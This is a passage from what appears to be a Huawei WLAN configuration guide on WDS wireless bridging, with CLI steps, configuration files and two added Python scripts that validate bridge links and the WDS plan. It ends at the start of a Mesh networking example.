[AC] interface gigabitEthernet 1/0/0
[AC-GigabitEthernet1/0/0] port link-type trunk
[AC-GigabitEthernet1/0/0] port trunk allow-pass vlan 100 to 106
[AC-GigabitEthernet1/0/0] quit

Step 2 Configure the AC to allocate IP addresses for APs and STAs.

# Configure the AC as a DHCP server to allocate IP addresses to APs and STAs using an address pool.
[AC] dhcp enable
[AC] interface vlanif 100
[AC-Vlanif100] ip address 192.168.10.1 24
[AC-Vlanif100] dhcp select interface
[AC-Vlanif100] quit
[AC] interface vlanif 101
[AC-Vlanif101] ip address 192.168.1.1 24
[AC-Vlanif101] dhcp select interface
[AC-Vlanif101] quit
[AC] interface vlanif 102
[AC-Vlanif102] ip address 192.168.2.1 24
[AC-Vlanif102] dhcp select interface
[AC-Vlanif102] quit
[AC] interface vlanif 103
[AC-Vlanif103] ip address 192.168.3.1 24
[AC-Vlanif103] dhcp select interface
[AC-Vlanif103] quit

Step 3 Configure AC system parameters.

# Configure the country code.
[AC] wlan ac-global country-code cn
Warning: Modify the country code may delete configuration on those AP which use
the global country code and reset them, continue?[Y/N]:y

# Configure the AC ID and carrier ID.
[AC] wlan ac-global ac id 1 carrier id other // The default AC ID is 0. Set the AC ID to 1.

# Configure the source interface.
[AC] wlan
[AC-wlan-view] wlan ac source interface vlanif 100

Step 4 Configure the AC to manage APs.

[AC-wlan-view] ap id 1 ap-type AP6010DN-AGN mac 0046-4b59-1ee0
[AC-wlan-ap-1] quit
[AC-wlan-view] ap id 2 ap-type AP6010DN-AGN mac 0046-4b59-1d20
[AC-wlan-ap-2] quit
[AC-wlan-view] ap id 3 ap-type AP6010DN-AGN mac 0046-4b59-1d40
[AC-wlan-ap-3] quit

# Create AP regions 101, 102, and 103. An AC has a default AP region with the ID 0. AP
regions 101, 102, and 103 are used as an example here.
[AC-wlan-view] ap-region id 101
[AC-wlan-ap-region-101] quit
[AC-wlan-view] ap-region id 102


[AC-wlan-ap-region-102] quit
[AC-wlan-view] ap-region id 103
[AC-wlan-ap-region-103] quit

# Add AP1 to AP region 101, AP2 to AP region 102, and AP3 to AP region 103. By default,
an AP is added to region 0. This example adds the three APs to regions 101, 102, and 103
respectively.
[AC-wlan-view] ap id 1
[AC-wlan-ap-1] region-id 101
[AC-wlan-ap-1] quit
[AC-wlan-view] ap id 2
[AC-wlan-ap-2] region-id 102
[AC-wlan-ap-2] quit
[AC-wlan-view] ap id 3
[AC-wlan-ap-3] region-id 103
[AC-wlan-ap-3] quit

Step 5 Set WDS bridge parameters.

# Create a WMM profile named wp01 and retain the default settings in the profile.
[AC-wlan-view] wmm-profile name wp01
[AC-wlan-wmm-prof-wp01] quit

# Create a radio profile rp02 for the WDS bridges, set the channel mode to fixed and retain
the default settings for other parameters, and bind the WMM profile wp01 to the radio profile.
The default channel mode is auto, but the fixed mode must be used in this example.
[AC-wlan-view] radio-profile name rp02 id 1
[AC-wlan-radio-prof-rp02] wmm-profile name wp01
[AC-wlan-radio-prof-rp02] channel-mode fixed // The APs along the WDS link must use the same channel, so the fixed mode must be used.
[AC-wlan-radio-prof-rp02] quit

# Create the bridge whitelists bw01 and bw02. By default, no bridge whitelist is created. This
example uses whitelist bw01 for the root node and whitelist bw02 for the middle node to
control connection between neighboring APs.
[AC-wlan-view] bridge-whitelist name bw01
[AC-wlan-br-whitelist-bw01] peer ap mac 0046-4b59-1d20 // The middle AP needs to connect to the root AP, so AP2's MAC address is added to bw01.
[AC-wlan-br-whitelist-bw01] quit
[AC-wlan-view] bridge-whitelist name bw02
[AC-wlan-br-whitelist-bw02] peer ap mac 0046-4b59-1d40 // The leaf AP needs to connect to the middle AP, so AP3's MAC address is added to bw02.
[AC-wlan-br-whitelist-bw02] quit

# Bind the radio profile rp02 to radio 1 of AP1, set the bridge mode of radio 1 to root, and
bind the bridge whitelist bw01 to radio 1. By default, no bridge whitelist is bound to a radio.
This example binds bridge whitelist bw01 to the root AP's radio.
[AC-wlan-view] ap 1 radio 1
[AC-wlan-radio-1/1] radio-profile name rp02
[AC-wlan-radio-1/1] bridge enable mode root
[AC-wlan-radio-1/1] bridge-whitelist name bw01
[AC-wlan-radio-1/1] bridge whitelist enable
[AC-wlan-radio-1/1] quit

# Bind the radio profile rp02 to radio 1 of AP2, set the bridge mode of radio 1 to middle, and
bind the bridge whitelist bw02 to radio 1. By default, no bridge whitelist is bound to a radio.
This example binds bridge whitelist bw02 to the middle AP's radio.
[AC-wlan-view] ap 2 radio 1
[AC-wlan-radio-2/1] radio-profile name rp02
[AC-wlan-radio-2/1] bridge enable mode middle
[AC-wlan-radio-2/1] bridge-whitelist name bw02


[AC-wlan-radio-2/1] bridge whitelist enable
[AC-wlan-radio-2/1] quit

# Bind AP3 radio 1 to the radio profile rp02 and set the wireless bridge working mode to leaf.
[AC-wlan-view] ap 3 radio 1
[AC-wlan-radio-3/1] radio-profile name rp02
[AC-wlan-radio-3/1] bridge enable mode leaf
[AC-wlan-radio-3/1] quit

# After the preceding configurations are complete, power on the APs. If the APs have already been powered on, restart the root AP to make the configuration take effect. Run the display ap all and display bridge-link all commands on the AC to check whether the APs work properly and whether the wireless virtual links (WVLs) are successfully established. If the WVLs are displayed and the status of all the APs is normal, the management bridge has been successfully established.
[AC-wlan-view] display ap all
All AP information:
Normal[3],Fault[0],Commit-failed[0],Committing[0],Config[0],Download[0]
Config-failed[0],Standby[0],Type-not-match[0],Ver-mismatch[0]
------------------------------------------------------------------------------
AP ID  AP Type  AP MAC  Profile ID/Region ID  AP State  AP Sysname
------------------------------------------------------------------------------
1 AP6010DN-AGN 0046-4b59-1ee0 0/101 normal ap-1
2 AP6010DN-AGN 0046-4b59-1d20 0/102 normal ap-2
3 AP6010DN-AGN 0046-4b59-1d40 0/103 normal ap-3
------------------------------------------------------------------------------
Total number: 3,printed: 3
[AC-wlan-view] display bridge-link all
------------------------------------------------------------------------------
AP ID AP MAC Radio ID Coverage Distance(100m) Channel Bridge Work Mode
Peer AP MAC Peer AP ID Peer AP Status RSSI(dBm) Max RSSI(dBm)
------------------------------------------------------------------------------
1 0046-4b59-1ee0 1 3 149 root
0046-4b59-1d20 2 normal -33 -32
2 0046-4b59-1d20 1 3 149 middle
0046-4b59-1ee0 1 normal -31 -31
2 0046-4b59-1d20 1 3 149 middle
0046-4b59-1d40 3 normal -33 -32
3 0046-4b59-1d40 1 3 149 leaf
0046-4b59-1d20 2 normal -31 -31
------------------------------------------------------------------------------
Total: 4
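As an added example that is not part of the original Huawei document, the following Python script parses the display bridge-link all output above and checks every reported WDS link against the data plan of this example: the peer must be authorized by the whitelist on the upstream side of the link, the reported work mode must match the plan, both ends must report the link, all links must share one channel, and the peer status and RSSI must be acceptable. The whitelist and mode dictionaries are taken from the data plan of this example; the RSSI floor of -70 dBm is an assumed operational threshold, not a value from the document.

```python
"""Constructed example: parse the AC's 'display bridge-link all' output and check
every reported WDS link against the data plan (whitelist authorization, work
mode, two-way reporting, common channel, peer status and a signal floor)."""
import re

# Constructed sample: the display output shown above, as captured from the AC.
BRIDGE_LINK_OUTPUT = """\
------------------------------------------------------------------------------
AP ID AP MAC Radio ID Coverage Distance(100m) Channel Bridge Work Mode
Peer AP MAC Peer AP ID Peer AP Status RSSI(dBm) Max RSSI(dBm)
------------------------------------------------------------------------------
1 0046-4b59-1ee0 1 3 149 root
0046-4b59-1d20 2 normal -33 -32
2 0046-4b59-1d20 1 3 149 middle
0046-4b59-1ee0 1 normal -31 -31
2 0046-4b59-1d20 1 3 149 middle
0046-4b59-1d40 3 normal -33 -32
3 0046-4b59-1d40 1 3 149 leaf
0046-4b59-1d20 2 normal -31 -31
------------------------------------------------------------------------------
Total: 4
"""
# Planned topology from the data plan: bw01 on the root AP1, bw02 on the middle AP2.
WHITELIST = {1: {"0046-4b59-1d20"}, 2: {"0046-4b59-1d40"}}
PLANNED_MODE = {1: "root", 2: "middle", 3: "leaf"}
RSSI_FLOOR_DBM = -70  # assumed operational threshold, not a value from the document

LINK_RE = re.compile(r"^(\d+) (\S+) (\d+) (\d+) (\d+) (root|middle|leaf)$")
PEER_RE = re.compile(r"^(\S+) (\d+) (\w+) (-?\d+) (-?\d+)$")


def parse_links(output):
    """Return one dict per link; each link spans two consecutive output lines."""
    links, head = [], None
    for line in (raw.strip() for raw in output.splitlines()):
        if m := LINK_RE.match(line):
            head = {"ap": int(m[1]), "mac": m[2], "radio": int(m[3]),
                    "channel": int(m[5]), "mode": m[6]}
        elif head and (m := PEER_RE.match(line)):
            links.append({**head, "peer_mac": m[1], "peer_ap": int(m[2]),
                          "peer_status": m[3], "rssi": int(m[4])})
            head = None
    return links


def verify_links(output, whitelist=WHITELIST, planned=PLANNED_MODE, floor=RSSI_FLOOR_DBM):
    """Return findings; an empty list means every reported link matches the plan."""
    links = parse_links(output)
    findings = []
    if len({lk["channel"] for lk in links}) > 1:
        findings.append("links report different channels; all WDS radios must share one")
    reported = {(lk["ap"], lk["peer_ap"]) for lk in links}
    for lk in links:
        tag = f"ap {lk['ap']} -> ap {lk['peer_ap']}"
        if planned.get(lk["ap"]) != lk["mode"]:
            findings.append(f"{tag}: radio works in {lk['mode']} mode, plan says {planned.get(lk['ap'])}")
        # A link is authorized when the upstream side's whitelist names the other end:
        # either this AP whitelists the peer, or the peer whitelists this AP.
        if (lk["peer_mac"] not in whitelist.get(lk["ap"], set())
                and lk["mac"] not in whitelist.get(lk["peer_ap"], set())):
            findings.append(f"{tag}: peer {lk['peer_mac']} is not authorized by any whitelist")
        if (lk["peer_ap"], lk["ap"]) not in reported:
            findings.append(f"{tag}: peer does not report the link back")
        if lk["peer_status"] != "normal":
            findings.append(f"{tag}: peer status is {lk['peer_status']}")
        if lk["rssi"] < floor:
            findings.append(f"{tag}: RSSI {lk['rssi']} dBm is below the {floor} dBm floor")
    return findings
```

Running verify_links against output captured after each commit ap, or periodically from a monitoring job, turns the display command into a check: an AP that bridges to a peer the plan never whitelisted, a node whose radio mode drifted from the plan, or a one-sided link shows up as a finding instead of being read past in a table.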

Step 6 Configure a radio profile and a WLAN-ESS interface.

# Create the radio profile rp01 for user services, use the default settings, and bind the radio profile to the WMM profile wp01.
profile to the WMM profile wp01.
[AC-wlan-view] radio-profile name rp01 id 0
[AC-wlan-radio-prof-rp01] wmm-profile name wp01
[AC-wlan-radio-prof-rp01] quit
[AC-wlan-view] quit

# Create a WLAN-ESS interface.
[AC] interface wlan-ess 1
[AC-Wlan-Ess1] port trunk allow-pass vlan 101
[AC-Wlan-Ess1] quit
[AC] interface wlan-ess 2
[AC-Wlan-Ess2] port trunk allow-pass vlan 102
[AC-Wlan-Ess2] quit
[AC] interface wlan-ess 3
[AC-Wlan-Ess3] port trunk allow-pass vlan 103
[AC-Wlan-Ess3] quit


Step 7 Configure the bridge profile and service set.

# Create security profile sp01, set the security and authentication policy to WPA2-PSK, set the authentication key to huawei123, and set the encryption mode to CCMP.
the authentication key to huawei123, and set the encryption mode to CCMP.

NOTE
The AP that establishes the bridge on a WDS network supports only WPA2+PSK+CCMP.
[AC] wlan
[AC-wlan-view] security-profile name sp01
[AC-wlan-sec-prof-sp01] security-policy wpa2
[AC-wlan-sec-prof-sp01] wpa2 authentication-method psk pass-phrase cipher
huawei123 encryption-method ccmp
[AC-wlan-sec-prof-sp01] quit

# Create a bridge profile with the name bp01 and identifier ChinaNet01, and bind the bridge
profile to the security profile sp01.
[AC-wlan-view] bridge-profile name bp01
[AC-wlan-bridge-prof-bp01] bridge-name ChinaNet01
[AC-wlan-bridge-prof-bp01] vlan tagged 101 to 106 // Allow packets of the service VLANs to pass.
[AC-wlan-bridge-prof-bp01] security-profile name sp01
[AC-wlan-bridge-prof-bp01] quit

# Create traffic profile tp01 and use the default settings.
[AC-wlan-view] traffic-profile name tp01
[AC-wlan-traffic-prof-tp01] quit

# Create and configure a service set ss01 and SSID ChinaSer01.
[AC-wlan-view] service-set name ss01
[AC-wlan-service-set-ss01] traffic-profile name tp01
[AC-wlan-service-set-ss01] security-profile name sp01
[AC-wlan-service-set-ss01] ssid ChinaSer01
[AC-wlan-service-set-ss01] service-vlan 101 // Change the VLAN ID of the service set to 101. (The default VLAN ID is 1.)
[AC-wlan-service-set-ss01] wlan-ess 1
[AC-wlan-service-set-ss01] quit

# Create and configure a service set ss02 and SSID ChinaSer02.
[AC-wlan-view] service-set name ss02
[AC-wlan-service-set-ss02] traffic-profile name tp01
[AC-wlan-service-set-ss02] security-profile name sp01
[AC-wlan-service-set-ss02] ssid ChinaSer02
[AC-wlan-service-set-ss02] service-vlan 102 // Change the VLAN ID of the service set to 102. (The default VLAN ID is 1.)
[AC-wlan-service-set-ss02] wlan-ess 2
[AC-wlan-service-set-ss02] quit

# Create and configure a service set ss03 and SSID ChinaSer03.
[AC-wlan-view] service-set name ss03
[AC-wlan-service-set-ss03] traffic-profile name tp01
[AC-wlan-service-set-ss03] security-profile name sp01
[AC-wlan-service-set-ss03] ssid ChinaSer03
[AC-wlan-service-set-ss03] service-vlan 103 // Change the VLAN ID of the service set to 103. (The default VLAN ID is 1.)
[AC-wlan-service-set-ss03] wlan-ess 3
[AC-wlan-service-set-ss03] quit

# Create a bridge VAP on AP1 radio 1 and bind the radio to the bridge profile. Create a
service VAP on AP1 radio 0 and bind the radio to the radio profile and service set.
[AC-wlan-view] ap 1 radio 0
[AC-wlan-radio-1/0] radio-profile name rp01
[AC-wlan-radio-1/0] service-set name ss01


[AC-wlan-radio-1/0] quit
[AC-wlan-view] ap 1 radio 1
[AC-wlan-radio-1/1] bridge-profile name bp01
[AC-wlan-radio-1/1] channel 40mhz-plus 157 // Radios that establish a WDS link must use the same channel and bandwidth. Here, the radios use 40 MHz bandwidth and channel 157.
[AC-wlan-radio-1/1] quit

# Create a bridge VAP on AP2 radio 1 and bind the radio to the bridge profile. Create a
service VAP on AP2 radio 0 and bind the radio to the radio profile and service set.
[AC-wlan-view] ap 2 radio 0
[AC-wlan-radio-2/0] radio-profile name rp01
[AC-wlan-radio-2/0] service-set name ss02
[AC-wlan-radio-2/0] quit
[AC-wlan-view] ap 2 radio 1
[AC-wlan-radio-2/1] bridge-profile name bp01
[AC-wlan-radio-2/1] channel 40mhz-plus 157
[AC-wlan-radio-2/1] quit

# Create a bridge VAP on AP3 radio 1 and bind the radio to the bridge profile. Create a service VAP on AP3 radio 0 and bind the radio to the radio profile and service set.
[AC-wlan-view] ap 3 radio 0
[AC-wlan-radio-3/0] radio-profile name rp01
[AC-wlan-radio-3/0] service-set name ss03
[AC-wlan-radio-3/0] quit
[AC-wlan-view] ap 3 radio 1
[AC-wlan-radio-3/1] bridge-profile name bp01
[AC-wlan-radio-3/1] channel 40mhz-plus 157
[AC-wlan-radio-3/1] quit

Step 8 Configure APs' wired interfaces.

# Set parameters for the AP3 wired interface.
[AC-wlan-view] ap id 3
[AC-wlan-ap-3] lineate-port gigabitethernet 0 mode endpoint // On a WDS network, downlink wired interfaces of APs must be set to the endpoint mode.
[AC-wlan-ap-3] lineate-port gigabitethernet 0 vlan tagged 104 to 106 // Add the AP's wired interface to VLANs 104, 105, and 106 in tagged mode.
[AC-wlan-ap-3] quit

NOTE

After changing the working mode of AP wired interfaces, reset the APs to make the configurations take
effect.

Step 9 Deliver parameters to APs.

The AP parameters configured on the AC take effect only after they are delivered to the APs.
[AC-wlan-view] commit ap 3
Warning: Committing configuration may cause service interruption, continue?[Y/N]:y
[AC-wlan-view] commit ap 2
Warning: Committing configuration may cause service interruption, continue?[Y/N]:y
[AC-wlan-view] commit ap 1
Warning: Committing configuration may cause service interruption, continue?[Y/N]:y

Step 10 Verify the configuration.

WLAN users in areas A, B, and C and wired users in area C can access the Internet.

----End


Configuration Files
l Configuration file of SwitchA
#
sysname SwitchA
#
vlan batch 100 to 106
#
interface GigabitEthernet0/0/1
port link-type trunk
port trunk pvid vlan 100
port trunk allow-pass vlan 100 to 106
port-isolate enable group 1
#
interface GigabitEthernet0/0/2
port link-type trunk
port trunk allow-pass vlan 100 to 106
#
return

l Configuration file of the AC
#
sysname AC
#
vlan batch 100 to 106
#
wlan ac-global carrier id other ac id 1
#
dhcp enable
#
interface Vlanif100
ip address 192.168.10.1 255.255.255.0
dhcp select interface
#
interface Vlanif101
ip address 192.168.1.1 255.255.255.0
dhcp select interface
#
interface Vlanif102
ip address 192.168.2.1 255.255.255.0
dhcp select interface
#
interface Vlanif103
ip address 192.168.3.1 255.255.255.0
dhcp select interface
#
interface GigabitEthernet1/0/0
port link-type trunk
port trunk allow-pass vlan 100 to 106
#
interface Wlan-Ess1
port trunk allow-pass vlan 101
#
interface Wlan-Ess2
port trunk allow-pass vlan 102
#
interface Wlan-Ess3
port trunk allow-pass vlan 103
#
wlan
wlan ac source interface vlanif100
ap-region id 101
ap-region id 102
ap-region id 103
ap id 1 type-id 19 mac 0046-4b59-1ee0 sn 210235555310CC003587
region-id 101
ap id 2 type-id 19 mac 0046-4b59-1d20 sn 210235555310CC000094
region-id 102
ap id 3 type-id 19 mac 0046-4b59-1d40 sn 210235555310CC00AC69


region-id 103
lineate-port gigabitethernet 0 mode endpoint
lineate-port gigabitethernet 0 vlan tagged 104 to 106
wmm-profile name wp01 id 0
traffic-profile name tp01 id 0
security-profile name sp01 id 0
security-policy wpa2
wpa2 authentication-method psk pass-phrase cipher %@%@QGZ2"N.FU!8XFIGcV\{QFUWb%@%@ encryption-method ccmp
service-set name ss01 id 0
wlan-ess 1
ssid ChinaSer01
traffic-profile id 0
security-profile id 0
service-vlan 101
service-set name ss02 id 1
wlan-ess 2
ssid ChinaSer02
traffic-profile id 0
security-profile id 0
service-vlan 102
service-set name ss03 id 2
wlan-ess 3
ssid ChinaSer03
traffic-profile id 0
security-profile id 0
service-vlan 103
bridge-profile name bp01 id 0
bridge-name ChinaNet01
security-profile id 0
vlan tagged 101 to 106
radio-profile name rp01 id 0
wmm-profile id 0
radio-profile name rp02 id 1
channel-mode fixed
wmm-profile id 1
bridge-whitelist name bw01 id 0
peer ap mac 0046-4b59-1d20
bridge-whitelist name bw02 id 1
peer ap mac 0046-4b59-1d40
ap 1 radio 0
radio-profile id 0
service-set id 0 wlan 1
ap 1 radio 1
radio-profile id 1
channel 40MHz-plus 157
bridge enable mode root
bridge whitelist enable
bridge-whitelist id 0
bridge-profile id 0
ap 2 radio 0
radio-profile id 0
service-set id 1 wlan 1
ap 2 radio 1
radio-profile id 1
channel 40MHz-plus 157
bridge enable mode middle
bridge whitelist enable
bridge-whitelist id 1
bridge-profile id 0
ap 3 radio 0
radio-profile id 0
service-set id 2 wlan 1
ap 3 radio 1
radio-profile id 1
channel 40MHz-plus 157
bridge enable mode leaf


bridge-profile id 0
#
return
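As an added example that is not part of the original Huawei document, the following Python script reads the WDS-relevant lines of the AC configuration file above and verifies the planning rules listed under Configuration Notes before the configuration is committed: exactly one root node, an enabled whitelist on every root and middle radio, whitelist MAC addresses that belong to managed APs, at most six subnodes per node, no middle-to-middle links, one channel on all bridge radios, and a link depth of at most three hops. It goes beyond the three-AP case on the page by walking the whole tree that the whitelists describe, so it applies to any WDS plan written in this configuration style. The sample configuration is constructed from the AC configuration file in this example, trimmed to the lines the parser uses.

```python
"""Constructed example: validate the WDS plan in a Huawei AC configuration dump
against the planning rules of this section (one root; middle nodes link only to
root and leaf nodes; at most three hops; at most six subnodes per node; root
and middle radios need an enabled whitelist; one channel on all bridge radios;
whitelist MACs must belong to managed APs)."""
import re
from collections import defaultdict

# Constructed sample: the WDS-relevant lines of the AC configuration file above.
AC_CONFIG = """\
ap id 1 type-id 19 mac 0046-4b59-1ee0
ap id 2 type-id 19 mac 0046-4b59-1d20
ap id 3 type-id 19 mac 0046-4b59-1d40
bridge-whitelist name bw01 id 0
peer ap mac 0046-4b59-1d20
bridge-whitelist name bw02 id 1
peer ap mac 0046-4b59-1d40
ap 1 radio 1
channel 40MHz-plus 157
bridge enable mode root
bridge whitelist enable
bridge-whitelist id 0
ap 2 radio 1
channel 40MHz-plus 157
bridge enable mode middle
bridge whitelist enable
bridge-whitelist id 1
ap 3 radio 1
channel 40MHz-plus 157
bridge enable mode leaf
"""
MAX_HOPS, MAX_SUBNODES = 3, 6  # root-middle-leaf is a 3-hop link; 6 subnodes per node


def parse(config):
    """Group the flat dump into AP MACs, whitelists and bridge radios."""
    ap_mac, whitelists, radios, ctx = {}, defaultdict(list), {}, None
    for line in (raw.strip() for raw in config.splitlines()):
        if m := re.match(r"ap id (\d+) .*mac (\S+)", line):
            ap_mac[int(m[1])] = m[2]
            ctx = None
        elif m := re.match(r"bridge-whitelist name \S+ id (\d+)", line):
            ctx = ("wl", int(m[1]))
        elif m := re.match(r"ap (\d+) radio (\d+)$", line):
            ctx = ("radio", (int(m[1]), int(m[2])))
            radios[ctx[1]] = {}
        elif ctx and ctx[0] == "wl" and (m := re.match(r"peer ap mac (\S+)", line)):
            whitelists[ctx[1]].append(m[1])
        elif ctx and ctx[0] == "radio":  # attribute line inside an "ap N radio M" block
            r = radios[ctx[1]]
            if m := re.match(r"bridge enable mode (\w+)", line):
                r["mode"] = m[1]
            elif m := re.match(r"bridge-whitelist id (\d+)", line):
                r["whitelist"] = int(m[1])
            elif m := re.match(r"channel (.+)", line):
                r["channel"] = m[1]
            elif line == "bridge whitelist enable":
                r["wl_enabled"] = True
        else:
            ctx = None  # any other top-level line closes the current block
    return ap_mac, whitelists, {k: v for k, v in radios.items() if "mode" in v}


def check(config):
    """Return the list of rule violations; an empty list means the plan is valid."""
    ap_mac, whitelists, radios = parse(config)
    mac_ap = {mac: ap for ap, mac in ap_mac.items()}
    mode_of = {ap: v["mode"] for (ap, _), v in radios.items()}
    findings, children = [], {}
    roots = [ap for (ap, _), v in radios.items() if v["mode"] == "root"]
    if len(roots) != 1:
        findings.append(f"expected exactly one root radio, found {len(roots)}")
    if len({v.get("channel") for v in radios.values()}) > 1:
        findings.append("bridge radios use different channels; the WDS link needs one channel")
    for (ap, rid), v in radios.items():
        if v["mode"] == "leaf":
            continue  # leaf radios require no whitelist
        if not (v.get("wl_enabled") and "whitelist" in v):
            findings.append(f"ap {ap} radio {rid}: {v['mode']} radio without an enabled whitelist")
        peers = whitelists.get(v.get("whitelist"), [])
        findings += [f"ap {ap} radio {rid}: whitelist MAC {m} is not a managed AP"
                     for m in peers if m not in mac_ap]
        if len(peers) > MAX_SUBNODES:
            findings.append(f"ap {ap}: {len(peers)} subnodes exceed the limit of {MAX_SUBNODES}")
        children[ap] = [mac_ap[m] for m in peers if m in mac_ap]

    def walk(ap, depth):  # depth counts nodes on the link: root=1, middle=2, leaf=3
        if depth > MAX_HOPS:
            findings.append(f"ap {ap}: WDS link exceeds {MAX_HOPS} hops")
            return
        for child in children.get(ap, []):
            if mode_of.get(ap) == "middle" and mode_of.get(child) == "middle":
                findings.append(f"ap {ap} -> ap {child}: middle nodes must not bridge to each other")
            walk(child, depth + 1)

    for root in roots:
        walk(root, 1)
    return findings
```

The script treats the whitelists as the authoritative description of the tree: the root's whitelist names its middle nodes, each middle node's whitelist names its leaves, and a leaf has none. Checking the plan this way, on the saved configuration rather than on the live links, catches a copy-paste slip such as the wrong MAC in a whitelist before commit ap delivers it to the APs.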

15.11 Example for Configuring the WLAN Service Using Mesh Technology
Mesh Overview
Mesh is short for wireless Mesh network (WMN), which is constituted by APs wirelessly
connected in a Mesh topology.

On a traditional WLAN network, APs connect to an AC through wired uplinks. Wired network deployment is costly in areas where network cables are difficult to deploy, for example, tunnels and docks. In these areas, Mesh technology can be used to deploy a wireless network quickly. A Mesh network supports dynamic, automatic configuration, allowing you to add or remove Mesh nodes flexibly. In addition, Mesh technology supports link redundancy between APs so that the failure of a single node will not affect the entire network. This improves network robustness.

A Mesh network has two types of nodes:
l Mesh portal point (MPP): a Mesh point that connects the Mesh network to other types of
networks. This node provides the portal function to allow Mesh nodes to communicate
with external networks.
l Mesh point (MP): a Mesh-capable node that uses IEEE 802.11 MAC and physical layer
protocols for wireless communication. This node supports automatic topology discovery,
automatic route discovery, and data packet forwarding. MPs can provide both Mesh
service and user access service.

Both WDS and Mesh technologies can implement wireless bridging between APs. A WDS
network supports a maximum of three hops (for example, a WDS link established along a root
node, a middle node, and a leaf node is a three-hop link), whereas a Mesh network supports a
maximum of eight hops. A WDS network has a tree topology and does not support link
redundancy between nodes. A Mesh network has a Mesh topology and supports link
redundancy between nodes. Therefore, a Mesh network is more reliable than a WDS network.
You can choose WDS or Mesh technology to deploy wireless bridging between APs
according to your needs.

Configuration Notes
l The AP2030DN, AP7030DE, AP9330DN, AP6310SN-GN and AP2010DN do not
support the Mesh function.
l On a WDS or Mesh network, an 802.11ac AP cannot interoperate with non-802.11ac
APs regardless of the radio types used by the AP. Only 802.11ac APs can interoperate
with each other.
NOTE
Among all WDS- or Mesh-capable APs, the AP4030DN, AP4130DN, AP5030DN, AP8030DN,
AP8130DN, and AP5130DN are 802.11ac APs.
l If radio 0 of the AP8130DN is configured to work on the 5 GHz frequency band and
used for WDS or Mesh services, the software version of the AP connected to the
AP8130DN must be V200R005C10 or later.


l It is recommended that you deploy no more than 40 Mesh nodes on a Mesh network.
l WDS and Mesh technologies cannot be used on the same network.
l If WDS and Mesh services are configured on an AP radio, WIDS, spectrum analysis, or
WLAN location on the radio does not take effect.
l How to configure the source interface:
– In V200R005 and V200R006, run the wlan ac source interface { loopback
loopback-number | vlanif vlan-id } command in the WLAN view.
– In V200R007 and V200R008, run the capwap source interface { loopback
loopback-number | vlanif vlan-id } command in the system view.
l The following table lists applicable products and versions.

Table 15-34 Applicable products and versions

Software Version | Product Model | AP Model and Version
V200R005C00 | S12700 | V200R005C00: AP3010DN-AGN, AP5010DN-AGN, AP5010SN-GN, AP5030DN, AP5130DN, AP6010SN-GN, AP6010DN-AGN, AP6510DN-AGN, AP6610DN-AGN, AP7110DN-AGN, AP7110SN-GN
V200R006C00 | S12700 | V200R005C00: AP3010DN-AGN, AP5010DN-AGN, AP5010SN-GN, AP5030DN, AP5130DN, AP6010SN-GN, AP6010DN-AGN, AP6510DN-AGN, AP6610DN-AGN, AP7110DN-AGN, AP7110SN-GN
V200R007C00 | S12700 | V200R005C10: AP3010DN-AGN, AP5010DN-AGN, AP5010SN-GN, AP5030DN, AP5130DN, AP6010SN-GN, AP6010DN-AGN, AP6510DN-AGN, AP6610DN-AGN, AP7110DN-AGN, AP7110SN-GN, AP8030DN, AP8130DN
V200R008C00 | S12700 | V200R005C10: AP3010DN-AGN, AP5010DN-AGN, AP5010SN-GN, AP5030DN, AP5130DN, AP6010SN-GN, AP6010DN-AGN, AP6510DN-AGN, AP6610DN-AGN, AP7110DN-AGN, AP7110SN-GN, AP8030DN, AP8130DN; V200R005C30: AP4030DN, AP4130DN

Networking Requirements
An enterprise has three office locations: Area A, Area B, and Area C. AP1 in Area A can connect to the access switch (SwitchA) through a wired link, but AP2 in Area B and AP3 in Area C cannot. A WMN needs to be deployed in the three areas to connect AP2 and AP3 to the enterprise network, as shown in Figure 15-15.

Figure 15-15 Mesh networking

(Figure not reproduced. It shows the AC connected through GE1/0/1 to GE0/0/2 of SwitchA,
GE0/0/1 of SwitchA connected to AP1 (MPP) in Area A, and AP2 (MP) in Area B and AP3 (MP)
in Area C reached over Mesh links. The figure also shows the IP backbone network above the
AC, an L2 network, STAs on the APs, and a legend marking the Mesh links.)

Data Plan
Before configuring the Mesh service, determine the types and MAC addresses of the APs
used as Mesh nodes. The following table provides the data plan for this example.

NOTE
The APs used in this example are AP6010DN-AGN.

Table 15-35 AP data required for completing the configuration

AP    Type           MAC
AP1   AP6010DN-AGN   0046-4b59-1ee0
AP2   AP6010DN-AGN   0046-4b59-1d20
AP3   AP6010DN-AGN   0046-4b59-1d40

The following provides data planning for Mesh service configuration.

Table 15-36 Service data required for completing the configuration

Item: VLAN
Data:
  - Management VLAN: 100
  - Service VLAN:
    - Area B: VLAN 102
    - Area C: VLAN 103 and VLANs 104, 105, and 106 on wired interfaces of AP3
Description: Wired interfaces of AP1 and AP3 must allow packets of VLANs to which Area B and Area C belong.

Item: AP service data forwarding mode
Data: Direct forwarding
Description: None

Item: IP address of the AC's source interface
Data: VLANIF 100: 192.168.10.1/24
Description: None

Item: AP region
Data:
  - AP region 101 for AP1
  - AP region 102 for AP2
  - AP region 103 for AP3
Description: None

Item: WMM profile
Data: Name: wp01
Description: None

Item: Radio profile
Data: Name: rp01 and rp02
Description: None

Item: Security profile
Data:
  - Name: sp01
  - Security and authentication policy: WPA2+PSK
  - Authentication key: 12345678
  - Encryption mode: CCMP encryption
Description: Mesh links support only the security policy using WPA2+PSK authentication and CCMP encryption. In this example, the security profile sp01 is also used for the basic WLAN service. Select an appropriate security policy for the WLAN service in real-world applications.

Item: Traffic profile
Data: Name: tp01
Description: None

Item: Mesh profile
Data:
  - Name: mesh01
  - ID: ChinaNet01
Description: All APs on a Mesh network must have the same Mesh network ID.

Item: Service set
Data:
  - Name: ss02
  - SSID: ChinaSer02
  - WLAN virtual interface: WLAN-ESS 2
  - Service data forwarding mode: direct forwarding
Description: None

Item: Service set
Data:
  - Name: ss03
  - SSID: ChinaSer03
  - WLAN virtual interface: WLAN-ESS 3
  - Service data forwarding mode: direct forwarding
Description: None

Item: Mesh whitelist
Data: Name: mesh01
Description: A Mesh whitelist specifies the MAC addresses of nodes that are allowed to connect to an AP. After a Mesh whitelist is bound to a radio of an AP, only the neighboring nodes with the MAC addresses in the whitelist can connect to the AP.

Configuration Roadmap
The configuration roadmap is as follows:
1. Configure the AC and SwitchA to implement Layer 2 connectivity between the AC,
SwitchA, and AP1.
2. Configure the Mesh function to enable AP2 and AP3 to connect to the AC through Mesh
links.
3. Configure the basic WLAN service to provide Internet access service for WLAN users in
Area A, Area B, and Area C.

Procedure
Step 1 Connect AP1 to the AC.
